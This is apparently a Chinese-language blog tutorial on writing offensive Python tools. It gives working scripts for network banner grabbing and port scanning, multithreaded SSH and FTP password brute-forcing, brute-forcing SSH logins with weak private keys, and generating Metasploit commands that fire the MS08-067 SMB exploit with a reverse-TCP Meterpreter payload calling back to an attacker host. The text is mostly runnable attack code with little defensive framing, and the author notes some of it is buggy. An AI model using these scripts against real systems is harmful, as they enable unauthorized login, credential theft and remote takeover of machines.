使用 Python 编写密码爆破工具


TCP连接扫描、抓取应用的Banner

#coding=utf-8
from socket import *
from threading import *

#定义一个信号量
screenLock = Semaphore(value=1)

def ScanBanner(addr,port):
    try:
        conn = socket(AF_INET,SOCK_STREAM)
        conn.connect((addr,port))
        conn.send(bytes("hello lyshark\r\n",encoding="utf-8"))
        res = conn.recv(200)
        # 加锁
        screenLock.acquire()
        print("[+] 主机: {} Banner: {}".format(addr,res))
    except Exception:
        # 加锁
        screenLock.acquire()
        print("[-] 主机: {} 不存在或已经关闭.".format(addr))
        pass
    finally:
        # 执行释放锁的操作
        screenLock.release()
        conn.close()

setdefaulttimeout(1)
for i in range(0,25):
    a = "192.168.1.{}".format(i)
    t = Thread(target=ScanBanner,args=(a,80))
    t.start()

使用nmap端口扫描代码

需要 pip install python-nmap

#coding=utf-8

# >>> nm = nmap.PortScanner()
# >>> nm.scan("192.168.1.1-20","21,22,80,45,135","-sV")
# >> nm.scan(hosts="192.168.1.20",arguments="-n -sP -PE -PA21,22,80

import nmap
import optparse

def nmapScan(tgtHost,tgtPort):
    #创建一个PortScanner()类对象
    nmScan = nmap.PortScanner()

    #调用PortScanner类的scan()函数,将目标和端口作为参数输入并进行nmap扫描
    nmScan.scan(tgtHost,tgtPort)

    #输出扫描结果中的状态信息
    state = nmScan[tgtHost]['tcp'][int(tgtPort)]['state']
    print '[*] ' + tgtHost + " tcp/" + tgtPort + " " + state

def main():
    parser=optparse.OptionParser("[*] Usage : ./nmapScan.py -H  -p ")
    parser.add_option('-H',dest='tgtHost',type='string',help='specify target host')
    parser.add_option('-p',dest='tgtPorts',type='string',help='specify target port[s]')    
    (options,args)=parser.parse_args()
    tgtHost = options.tgtHost
    tgtPorts = str(options.tgtPorts).split(',')
    if (tgtHost == None) | (tgtPorts[0] == None):
        print parser.usage
        exit(0)
    for tgtPort in tgtPorts:
        nmapScan(tgtHost,tgtPort)

if __name__ == '__main__':    
    main()

用Pexpect与SSH交互

需要先下载Pexpect:pip install pexpect  该工具只能在linux系统中使用,且可以登录ftp等,不局限于ssh

#coding=utf-8
import pexpect
from threading import *

def SSHConnect(Host,User,Password,Port):
    PROMPT = ["# ",">>> ","> ","\$ "]
    ssh_newkey = 'Are you sure you want to continue connecting'
    connStr = 'ssh ' + User + '@' + Host + ' -p ' + Port
    try:
        # 为ssh命令生成一个spawn类的对象
        child = pexpect.spawn(connStr,timeout=1)
        # 期望有ssh_newkey字符、提示输入密码的字符出现,否则超时
        ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
        if ret == 0:
            return 0
        if ret == 1:
        # 发送yes回应ssh_newkey并期望提示输入密码的字符出现
            child.sendline('yes')
            ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
        if ret == 0:
            return 0
        # 发送密码
        child.sendline(Password)
        child.expect(PROMPT)
        return 1
    except Exception:
        pass
        return 0
child = SSHConnect("192.168.1.20","root","123","22")
print(child)

pexpect 登录执行命令

#-*- coding:UTF-8 -*-
import pexpect


def ssh(user,host,password,port,command):
    child = pexpect.spawn('ssh -l %s %s -p %s %s' %(user,host,port,command))
    # 0 : 连接超时
    # 1 :ssh有时候提示你是否确认连接
    # 2 :提示输入密码
    # 3 :匹配到#号,表示命令已经执行完毕
    ret = child.expect([pexpect.TIMEOUT, 'Are you sure you want to continue connecting','[Pp]assword:',r"([^-]>|#)"])
    if ret == 0:                   # 连接超时
        return 0
    elif ret == 1:                 # SSH提示你是否确认连接
        child.sendline ('yes')     # 我们输入yes
        child.expect ('password: ')# 输入yes后应该提示输入密码,我们再次期待 password
        ret = child.expect([pexpect.TIMEOUT, 'password: '])
        if ret == 0:               # 连接超时
            return 0
    ret = child.sendline(password)
    if ret == 5:
        child.expect(pexpect.EOF)
        return child.before
    return 0


if __name__ =='__main__':
    try:
        host='192.168.1.20'
        user="root"
        password = '1233'
        command="ifconfig"
        child = ssh(user,host,password,"22",command)
        print(child)
    except Exception as e:
        print (e)

用pexpect 暴力破解SSH密码

#coding=utf-8
import pexpect
import os,sys
import threading
from optparse import OptionParser

def SSHConnect(Host,User,Password,Port):
    PROMPT = ["# ",">>> ","> ","\$ "]
    ssh_newkey = 'Are you sure you want to continue connecting'
    connStr = 'ssh ' + User + '@' + Host + ' -p ' + Port
    try:
        # 为ssh命令生成一个spawn类的对象
        child = pexpect.spawn(connStr , timeout=1)
        # 查询是否存在 ssh_newkey 里面的字符串、提示输入密码的字符出现,否则超时
        ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
        if ret == 0:
            return 0
        if ret == 1:
        # 发送yes回应ssh_newkey并等待,提示输入密码的字符出现
            child.sendline('yes')
            ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
        if ret == 0:
            return 0
        # 发送密码
        child.sendline(Password)
        child.expect(PROMPT)
        return 1
    except Exception:
        pass
        return 0

def ThreadBlast(Host,User,Password,Port,semaphore):
    # 加锁
    semaphore.acquire()
    RetCode = SSHConnect(Host,User,Password,Port)
    if RetCode == 1:
        print("[+] --> 主机: {} 状态码: {} -------> 密码: {}".format(Host,RetCode,Password))
    else:
        # 释放锁
        print("[-] --> 主机: {} 状态码: {}".format(Host,RetCode))
        semaphore.release()

if __name__ == "__main__":
    parser = OptionParser()
    parser.add_option("-H","--host",dest="host",help="set host 192.168.1.1")
    parser.add_option("-u","--user",dest="user",help="set user root")
    parser.add_option("-p","--port",dest="port",help="set port 22")
    parser.add_option("-f","--file",dest="file",help="set file wordlist.log")
    (options,args) = parser.parse_args()
    if options.host and options.user and options.port and options.file:
        # 设置线程锁,每次执行5个线程
        semaphore = threading.Semaphore(5)
        fp = open(options.file,"r")
        PassList = fp.readlines()
        for item in PassList:
            t = threading.Thread(target=ThreadBlast,args=(options.host,options.user,item,options.port,semaphore))
            t.start()
    else:
        parser.print_help()

关于有时,密码失败已经解决了,如下图,这里我就不贴代码了,上面代码有点问题的,自己改改吧。

用pxssh 暴力破解SSH密码

# -*- coding: utf-8 -*-
import optparse
from pexpect import pxssh
import time
from threading import *

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0

def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print("[+] Password Found " + password)
        Found = True
    except Exception as e:
        if "read_nonblocking" in str(e):
            Fails += 1
            time.sleep(5)
            connect(host, user, password, False)
        elif "synchronize with original prompt" in str(e):
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        if release:
            connection_lock.release()
def main():
    parser = optparse.OptionParser("usage%prog" + "-H  -u  -F ")
    parser.add_option("-H", dest="tgtHost", type="string", help="specify target host")
    parser.add_option("-u", dest="user", type="string", help="specify the user")
    parser.add_option("-F", dest="passwordFile", type="string", help="specify password file")
    options, args = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwordFile
    user = options.user
    if host is None or passwdFile is None or user is None:
        print(parser.usage)
        exit(0)
    fn = open(passwdFile, "r")
    for line in fn.readlines():
        if Found:
            # 如果发现了密码就退出
            print("[*] Exiting: Password Found")
            exit(0)
        if Fails > 5:
            print("[!] Too Many Socket Timeouts")
            exit(0)
        connection_lock.acquire()
        password = line.strip("\r").strip("\n")
        print("[-] Testing: " + str(password))
        t = Thread(target=connect, args=(host, user, password, True))
        t.start()

if __name__ == "__main__":
    main()

利用SSH中的弱密钥

使用密钥登录ssh时,格式为:ssh user@host -i keyfile -o PasswordAuthentication=no

#!/usr/bin/python
#coding=utf-8
import pexpect
import optparse
import os
from threading import *

maxConnections = 5
#定义一个有界信号量BoundedSemaphore,在调用release()函数时会检查增加的计数是否超过上限
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0

def connect(host,user,keyfile,release):

    global Stop
    global Fails

    try:
        perm_denied = 'Permission denied'
        ssh_newkey = 'Are you sure you want to continue'
        conn_closed = 'Connection closed by remote host'
        opt = ' -o PasswordAuthentication=no'
        connStr = 'ssh ' + user + '@' + host + ' -i ' + keyfile + opt
        child = pexpect.spawn(connStr)
        ret = child.expect([pexpect.TIMEOUT,perm_denied,ssh_newkey,conn_closed,'$','#', ])
        #匹配到ssh_newkey
        if ret == 2:
            print '[-] Adding Host to ~/.ssh/known_hosts'
            child.sendline('yes')
            connect(user, host, keyfile, False)
        #匹配到conn_closed
        elif ret == 3:
            print '[-] Connection Closed By Remote Host'
            Fails += 1
        #匹配到提示符'$','#',
        elif ret > 3:
            print '[+] Success. ' + str(keyfile)
            Stop = True
    finally:
        if release:
            #释放锁
            connection_lock.release()

def main():
    parser = optparse.OptionParser('[*] Usage : ./sshBrute.py -H  -u  -d ')
    parser.add_option('-H',dest='host',type='string',help='specify target host')
    parser.add_option('-u',dest='username',type='string',help='target username')
    parser.add_option('-d',dest='passDir',type='string',help='specify directory with keys')
    (options,args) = parser.parse_args()

    if (options.host == None) | (options.username == None) | (options.passDir == None):
        print parser.usage
        exit(0)

    host = options.host
    username = options.username
    passDir = options.passDir

    #os.listdir()返回指定目录下的所有文件和目录名
    for filename in os.listdir(passDir):
        if Stop:
            print '[*] Exiting: Key Found.'
            exit(0)
        if Fails > 5:
            print '[!] Exiting: Too Many Connections Closed By Remote Host.'
            print '[!] Adjust number of simultaneous threads.'
            exit(0)
        #加锁
        connection_lock.acquire()

        #连接目录与文件名或目录
        fullpath = os.path.join(passDir,filename)
        print '[-] Testing keyfile ' + str(fullpath)
        t = Thread(target=connect,args=(username,host,fullpath,True))
        child = t.start()

if __name__ =='__main__':
    main()

使用Ftplib暴力破解FTP用户口令

通过ftplib模块,结合读取含有密码的文件来实现FTP用户口令的破解

#!/usr/bin/python
#coding=utf-8
import ftplib

def bruteLogin(hostname,passwdFile):
    pF = open(passwdFile,'r')
    for line in pF.readlines():
        username = line.split(':')[0]
        password = line.split(':')[1].strip('\r').strip('\n')
        print '[+] Trying: ' + username + '/' + password
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(username,password)
            print '\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + password
            ftp.quit()
            return (username,password)
        except Exception, e:
            pass
    print '\n[-] Could not brubrute force FTP credentials.'
    return (None,None)

host = '10.10.10.128'
passwdFile = 'ftpBL.txt'
bruteLogin(host,passwdFile)

在FTP服务器上搜索网页

有了FTP服务器的登录口令之后,可以进行测试该服务器是否提供Web服务,其中检测通过nlst()列出的每个文件的文件名是不是默认的Web页面文件名,并把找到的所有默认的网页都添加到retList数组中

#!/usr/bin/python
#coding=utf-8
import ftplib

def returnDefault(ftp):
    try:
        #nlst()方法获取目录下的文件
        dirList = ftp.nlst()
    except:
        dirList = []
        print '[-] Could not list directory contents.'
        print '[-] Skipping To Next Target.'
        return

    retList = []
    for filename in dirList:
        #lower()方法将文件名都转换为小写的形式
        fn = filename.lower()
        if '.php' in fn or '.asp' in fn or '.htm' in fn:
            print '[+] Found default page: '+filename
            retList.append(filename)
    return retList

host = '10.10.10.130'
username = 'ftpuser'
password = 'ftppassword'
ftp = ftplib.FTP(host)
ftp.login(username,password)
returnDefault(ftp)

编写Python脚本与Metasploit交互

在findTgts()函数中实现对整个网段的主机445端口的扫描,setupHandler()函数实现目标主机被攻击后进行远程交互的监听器的功能

#!/usr/bin/python
#coding=utf-8

import nmap

def findTgts(subNet):
    nmScan = nmap.PortScanner()
    nmScan.scan(subNet,'445')
    tgtHosts = []
    for host in nmScan.all_hosts():
        #若目标主机存在TCP的445端口
        if nmScan[host].has_tcp(445):
            state = nmScan[host]['tcp'][445]['state']
            #并且445端口是开启的
            if state == 'open':
                print '[+] Found Target Host: ' + host
                tgtHosts.append(host)
    return tgtHosts

def setupHandler(configFile,lhost,lport):
    configFile.write('use exploit/multi/handler\n')
    configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
    configFile.write('set LPORT ' + str(lport) + '\n')
    configFile.write('set LHOST ' + lhost + '\n')
    configFile.write('exploit -j -z\n')

    #设置全局变量DisablePayloadHandler,让已经新建一个监听器之后,后面的所有的主机不会重复新建监听器
    #其中setg为设置全局参数
    configFile.write('setg DisablePayloadHandler 1\n')

def confickerExploit(configFile,tgtHost,lhost,lport):
    configFile.write('use exploit/windows/smb/ms08_067_netapi\n')
    configFile.write('set RHOST ' + str(tgtHost) + '\n')
    configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
    configFile.write('set LPORT ' + str(lport) + '\n')
    configFile.write('set LHOST ' + lhost + '\n')

    #-j参数表示攻击在后台进行,-z参数表示攻击完成后不与会话进行交互
    configFile.write('exploit -j -z\n')

相关